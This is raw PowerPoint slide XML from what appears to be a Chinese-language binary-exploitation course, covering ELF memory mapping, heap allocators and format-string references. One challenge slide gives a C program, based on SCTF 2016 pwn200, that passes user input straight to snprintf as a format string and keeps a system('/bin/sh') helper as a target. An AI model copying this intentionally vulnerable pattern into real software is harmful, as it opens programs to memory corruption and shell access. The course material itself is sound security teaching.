              <a:gd name="adj2" fmla="val 45447"/>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771">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27330B4C-CC35-4AEE-AB8C-580A43F7E0AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754731" y="3974467"/>
            <a:ext cx="369310" cy="1100307"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 4544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2" name="Shape 772">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CE0112-144D-44E6-81AB-F45B02885F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="1"/>
            <a:endCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124041" y="4474524"/>
            <a:ext cx="1263973" cy="1087558"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="1155CC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Shape 773">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB1F4525-A453-4CB0-8FA8-E20B4FF2C42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="1"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124041" y="3521025"/>
            <a:ext cx="1263973" cy="1754753"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6AA84F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 774">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF84555E-43AF-4C10-A609-A8F7CD72C922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2289488" y="3417471"/>
            <a:ext cx="611383"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RW</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 775">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2644DF09-4943-407B-908F-35D561F70633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2289489" y="4377171"/>
            <a:ext cx="544270"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RX</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 776">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AF69B0-A968-4036-8F85-C3A7FD1B533C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214563" y="2217571"/>
            <a:ext cx="1187075"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Disk</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 777">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73658F59-0947-4322-A8F5-8BC71C1930F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6542988" y="2217571"/>
            <a:ext cx="1462508"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Memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Shape 778">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638AD9FC-6BE1-45E1-838C-0A9F2D16A17A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8150459" y="5114171"/>
            <a:ext cx="1817466" cy="286303"/>
            <a:chOff x="6260750" y="4058550"/>
            <a:chExt cx="1405500" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Shape 779">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E879E40D-B995-43C7-8901-3A20C336D541}"/>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0x08049000</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="50" name="Shape 780">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0773BA1-C2A0-4399-B456-43D22061529C}"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B4DE75-4A4A-40CE-AC81-B3599F888E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933998" y="5167594"/>
            <a:ext cx="1980029" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –s elf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF9B794B-0741-40A7-B070-5D0F74F32BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6101357"/>
            <a:ext cx="2428870" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ cat /proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/maps</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Shape 773">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF8CB4B-B2C7-4006-847E-0BE62EAF9FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="46" idx="3"/>
            <a:endCxn id="47" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4401638" y="2360723"/>
            <a:ext cx="214135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矩形 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE82D1DB-DD7B-4784-89C6-1029D9C46ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4987244" y="1981599"/>
            <a:ext cx="970137" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ ./elf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="矩形 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE90358-DA20-4011-AA0F-9377CF97F20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17756829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4" name="Shape 213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Challenge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2135" name="Shape 2135"/>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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// simplified version of SCTF 2016 pwn200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s[0x400];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buf[0x400];</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run_system() { system("/bin/sh"); }</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main()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for (int i = 0; i &lt; 2; i++)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fgets(buf, 1024, stdin);</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snprintf(s, 1024, buf);</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puts(s);</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fflush(stdout);</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2136" name="Shape 2136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6911233" y="3130800"/>
            <a:ext cx="3588800" cy="16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Can you pwn</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using different solutions?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin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Shape 214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Tools and Ref</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2142" name="Shape 2142"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/hellman/libformatstr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pP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CAA0C6-5FEB-4A44-8708-E31EB131A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257" y="2188918"/>
            <a:ext cx="9467342" cy="2254129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3076798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5B242C3-8CA9-436E-A166-131014FF0FBC}"/>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31910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5</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堆利用</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911687" y="2108456"/>
            <a:ext cx="5489064"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堆分配策略</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Malloc</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free</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98590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3" name="Shape 625">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6486D0-8A9D-4034-92C7-4D9DEC8B050D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="1761792"/>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34" name="Shape 626">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE33139-0FCF-45C5-9D03-4466DBF979C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="2083633"/>
            <a:ext cx="2263516" cy="32993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35" name="Shape 627">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B893BA63-ADB6-4EB3-8F89-D21C619B80C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="2405475"/>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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A17B47-B940-4CAA-9D9D-4DD07C4197CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="3114301"/>
            <a:ext cx="2263516" cy="51973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37" name="Shape 629">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAF25EF-FF2C-43CD-A062-53DF30A7530B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="3634036"/>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Shape 630">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A7E7B0-4426-41C6-B5E6-09EF155A7312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4342862"/>
            <a:ext cx="2263516" cy="321841"/>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39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06B9A00-BB6D-4F23-ACAB-0CEA3C82EB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4664703"/>
            <a:ext cx="2263516" cy="321841"/>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40" name="Shape 632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC857F8-D716-4150-9FA1-6C044A6E2E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="4986545"/>
            <a:ext cx="2263516" cy="32184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41" name="Shape 633">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE06876-86F0-41EE-A5D6-0A27738357C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066245" y="5308386"/>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42" name="Shape 634">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B8D12D-FCED-4D75-A7B7-BCBC47D77CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3198003" y="2405475"/>
            <a:ext cx="0" cy="431704"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Shape 635">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E6FCC5-243E-4E16-BEA6-EC9AC92D6451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3198003" y="3950596"/>
            <a:ext cx="0" cy="392266"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE03EF-B4A1-4542-A27A-785FEDEB7A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6378031" y="1828797"/>
            <a:ext cx="2236510"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什么是堆？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2992567"/>
            <a:ext cx="5418338" cy="2308324"/>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是虚拟地址空间的一块连续的线性区域</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提供动态分配的内存，允许程序申请大小未知的内存</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在用户与操作系统之间，作为动态内存管理的中间人</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响应用户的申请内存请求， 向操作系统申请内存，然后将其返回给用户程序</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管理用户所释放的内存，适 时归还给操作系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C488FD-CB9B-43A7-96B9-C990A9E7C4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28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1567721" y="2247772"/>
            <a:ext cx="264687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各种堆管理器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630072" y="3192336"/>
            <a:ext cx="4522177" cy="1200329"/>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dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – General purpose allocator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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ptmalloc2</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glibc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（敲黑板）</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jemalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – FreeBSD and Firefox</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tcmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>libumem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> – Solaris</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE958F3E-1971-488F-B0FA-0B9BFE67BF0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09E65F4-6436-4869-9112-164DBD7ED522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7039753" y="2832547"/>
            <a:ext cx="4338918" cy="1477328"/>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堆管理器并非由操作系统实现，而是由libc.so.6链接库实现。 封装了一些系统调用，为用户提供方便的动态内存分配接口的同时，力求高效地管理由系统调用申请来的内存。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16023583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552010" y="2370426"/>
            <a:ext cx="295465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申请内存的系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7072D26-E1BF-4A91-96F2-310C1BD8CF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613984" y="3273013"/>
